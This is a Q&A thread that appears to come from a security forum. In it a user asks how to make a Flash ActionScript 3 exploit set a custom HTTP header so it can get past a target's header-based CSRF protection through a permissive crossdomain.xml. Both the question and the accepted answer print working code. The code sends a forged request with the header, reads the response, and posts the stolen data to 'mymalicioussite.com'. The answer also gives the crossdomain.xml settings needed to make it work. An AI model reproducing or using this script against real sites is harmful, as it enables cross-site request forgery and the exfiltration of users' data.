4

I have a target which has weak CrossDomain.xml but it prevents CSRF attack looking at one of the custom HTTP headers. I found following actionscript on a couple of websites, which works perfectly except that it doesnt set the header.

This actionscript sends a POST request to 'Target.htm' and I need it to set any custom header , say Test-Header:

package {
    import flash.display.Sprite;
    import flash.events.*;
    import flash.net.URLRequestMethod;
    import flash.net.URLRequest;
    import flash.net.URLLoader;
    import flash.net.URLVariables;
    import flash.net.URLRequestHeader;

    public class FlashTest extends Sprite {

        public function FlashTest() {
            // write as3 code here..
            //Target URL           
            var header:URLRequestHeader = new URLRequestHeader("Test-Header", "Test123");
            var readFrom:String = "http://192.168.100.4/Target.htm";
            var readRequest:URLRequest = new URLRequest(readFrom);
            readRequest.data  = "ThisDoesNotMatter"
            readRequest.method = URLRequestMethod.POST
            readRequest.requestHeaders.push(header);
            var getLoader:URLLoader = new URLLoader();
            getLoader.addEventListener(Event.COMPLETE, eventHandler);
            try
            {
                getLoader.load(readRequest);
            }
            catch(error:Error)
            {

            }
        }

        private function eventHandler(event:Event):void
        {
            var sendTO:String = "http://mymalicioussite.com";
            var sendRequest:URLRequest = new URLRequest(sendTO);
            sendRequest.method = URLRequestMethod.POST;
            sendRequest.data = event.target.data;
            var sendLoader:URLLoader = new URLLoader();
            try
            {
                sendLoader.load(sendRequest);
            }
            catch(error:Error)
            {

            }
          }
        }
      }

CrossDomain.XML on the target:

    <?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" secure="true" />
</cross-domain-policy>

Any help would be appreciated. A working code with GET request instead of POST would also work as target accepts both, GET and POST requests. As far as I know, setting custom headers are allowed only with POST request but a GET request with any standard HTTP header would work for me at least for now.

Improve this question
6
  • Does crossdomain.xml have allow-http-request-headers-from ? Commented Mar 26, 2017 at 11:40
  • @paj28: Yes, it allows requests from any domain. <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "adobe.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*" secure="true" /> </cross-domain-policy> Commented Mar 26, 2017 at 13:04
  • I don't see allow-http-request-headers-from in that snippet. Commented Mar 26, 2017 at 13:39
  • @paj28: Sorry about that, the crossdomain.xml on target does not have 'allow-http-request-headers-from'. However, if I add this header to the crossdomain.xml on requesting domain, would it work? Commented Mar 26, 2017 at 13:40
  • I think so. You'd need to try it to be sure Commented Mar 26, 2017 at 14:20

1 Answer 1

Reset to default
1

After performing a few tests, I was able to modify the script mentioned above to set any custom header ( except for Referer and User-Agent headers that browsers do not allow):

Also, This works only if the target and attacking machine should have following crossdomain.xml:

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-
domain-policy.dtd">
<cross-domain-policy>
 <allow-access-from domain="*" secure="false"  />
 <allow-http-request-headers-from domain="*" headers="*" secure="false"/>
</cross-domain-policy>

And here is the AS3 script that worked for me:

package {
import flash.display.Sprite;
import flash.events.*;
import flash.net.URLRequestMethod;
import flash.net.URLRequest;
import flash.net.URLLoader;
import flash.net.URLVariables;
import flash.net.URLRequestHeader;

public class FlashTest extends Sprite {

    public function FlashTest() {
        // write as3 code here..

        //Set Header
        var headers:Array = [new URLRequestHeader("TestHeader", "Test123")];

        //Target URL           
        var readFrom:String = "http://192.168.253.133/Target.htm";
        var readRequest:URLRequest = new URLRequest(readFrom);
        readRequest.requestHeaders = headers;
        readRequest.data  = "ThisDoesNotMatter" //POST data
        readRequest.method = URLRequestMethod.POST
        //readRequest.requestHeaders.push();
        var getLoader:URLLoader = new URLLoader();
        getLoader.addEventListener(Event.COMPLETE, eventHandler);
        try
        {
            getLoader.load(readRequest);
        }
        catch(error:Error)
        {

        }
    }

    private function eventHandler(event:Event):void
    {
        var sendTO:String = "http://mymalicioussite.com";
        var sendRequest:URLRequest = new URLRequest(sendTO);
        sendRequest.method = URLRequestMethod.POST;
        sendRequest.data = event.target.data;
        var sendLoader:URLLoader = new URLLoader();
        try
        {
            sendLoader.load(sendRequest);
        }
        catch(error:Error)
        {

        }
      }
    }
}//package
Improve this answer

You must log in to answer this question.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.